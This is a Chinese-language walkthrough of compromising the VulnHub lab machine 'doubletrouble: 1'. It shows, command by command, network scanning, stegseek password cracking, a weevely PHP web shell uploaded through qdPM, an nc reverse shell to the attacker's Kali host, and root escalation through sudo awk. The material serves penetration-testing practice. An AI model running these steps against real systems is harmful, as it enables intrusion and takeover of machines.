1.环境搭建
靶机下载:doubletrouble: 1 ~ VulnHub
2.渗透过程
将靶机网络改为仅主机模式,和kali虚机使用一个网卡
开启靶机
在kali中使用nmap -sn 扫描开启的虚机
nmap -sn 192.168.56.0/24
发现靶机IP地址,使用nmap -sS 扫描靶机
nmap -sS 192.168.56.107
使用浏览器访问靶机80端口
http://192.168.56.107
发现是qdPM 9.1,先使用dirb扫描web目录
dirb http://192.168.56.107
发现secret,uploads目录,浏览器访问secret
http://192.168.56.107/secret
发现一张图片,使用wget下载图片,这图片中可以有提示
wget http://192.168.56.107/secret/doubletrouble.jpg
这图片是stegtseek加密的图片,使用工具进行爆破
stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf output
查看output文件
cat output
得到用户名和密码,在浏览器中登陆
登陆成功,在页面中存在一个文件上传漏洞
使用kali中的weevely工具生成木马文件
weevely generate 666 shell.php
上传文件显示失败
在浏览器中查看一下uplaods目录中的文件
发现出存在刚刚上传的文件,使用weevely工具进行连接
weevely http://192.168.56.107/uploads/users/508828-shell.php
连接成功使用nc工具监听6666端口
nc -lvp 6666
使用nc工具进行反弹shell
nc -e /bin/bash 192.168.56.101 6666
使用python3命令,进行python交互
python3 -c 'import pty;pty.spawn("/bin/bash")'
查看权限
sudo -l
发现使用的是awk(文本分析工具),进行提权
sudo awk 'BEGIN {system("/bin/bash")}'
提权成功
id